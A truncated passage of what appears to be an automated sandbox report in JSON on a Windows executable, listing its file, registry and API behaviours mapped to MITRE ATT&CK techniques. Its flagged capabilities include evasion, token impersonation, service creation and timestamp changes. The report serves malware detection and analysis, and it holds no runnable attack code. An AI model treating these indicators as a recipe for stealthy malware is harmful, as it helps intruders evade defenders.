\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\UXTHEME.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\WINMM.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\SAMCLI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" reads file \"c:\\234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" reads file \"c:\\windows\\fonts\\staticcache.dat\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" reads file \"c:\\windows\\win.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\APPCOMPATFLAGS\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe.Local\\\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\COMCTL32.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\AppPatch\\AcGenral.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\SspiCli.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\SspiCli.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\UxTheme.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\UxTheme.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\samcli.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\samcli.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\MSACM32.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\MSACM32.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\VERSION.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\VERSION.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\sfc.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\sfc.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\sfc_os.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\sfc_os.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\dwmapi.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to touch file \"C:\\Windows\\system32\\dwmapi.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe.Local\\\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe.Config\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\UxTheme.dll.Config\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\234FDEA3AE1F20F2FD031B204511B9EB676B781B04B2A494A34DA9C380D92F8C.EXE.LOCAL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\234FDEA3AE1F20F2FD031B204511B9EB676B781B04B2A494A34DA9C380D92F8C.EXE.CONFIG\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\UXTHEME.DLL.CONFIG\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"LoadLibraryExA\" (Indicator: \"LoadLibrary\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"LoadLibraryExA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-199", "type": 2, "relevance": 1, "name": "Contains ability to create a service (API string)", "description": "Found reference to API \"CreateServiceA\" (Indicator: \"CreateService\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateServiceA\" (Indicator: \"CreateService\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\APPCOMPATFLAGS\"; Key: \"SHOWDEBUGINFO\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\WINDOWS FILE PROTECTION\"; Key: \"KNOWNDLLLIST\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"234FDEA3AE1F20F2FD031B204511B9EB676B781B04B2A494A34DA9C380D92F8C\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Makes a code branch decision directly after an API that is environment aware\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-306", "type": 2, "relevance": 1, "name": "Contains ability to impersonate access tokens (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"LoadLibraryExA\" (Indicator: \"LoadLibrary\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"LoadLibraryExA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-192", "type": 2, "relevance": 1, "name": "Contains ability to modify system service (API string)", "description": "Found reference to API \"ControlService\" (Indicator: \"ControlService\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ControlService\" (Indicator: \"ControlService\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-145", "type": 2, "relevance": 1, "name": "Found virtual disk drive like strings", "description": "Found string - \\\\.\\wowsub; Source: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string - \\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A; Source: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string - \\\\.\\wowsub; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found string - \\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-544", "type": 2, "relevance": 1, "name": "Contains ability to open a service (API string)", "description": "Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadResource with parameter {'hModule': '1792147456', 'hResInfo': '1792575560'}\" (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadResource with parameter {'hModule': '1792147456', 'hResInfo': '1792575096'}\" (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadResource with parameter {'hModule': '1792147456', 'hResInfo': '1792575576'}\" (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadResource with parameter {'hModule': '1792147456', 'hResInfo': '1792575128'}\" (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadResource with parameter {'hModule': '41091073', 'hResInfo': '41217600'}\" (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadResource with parameter {'hModule': '41091073', 'hResInfo': '41193632'}\" (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", 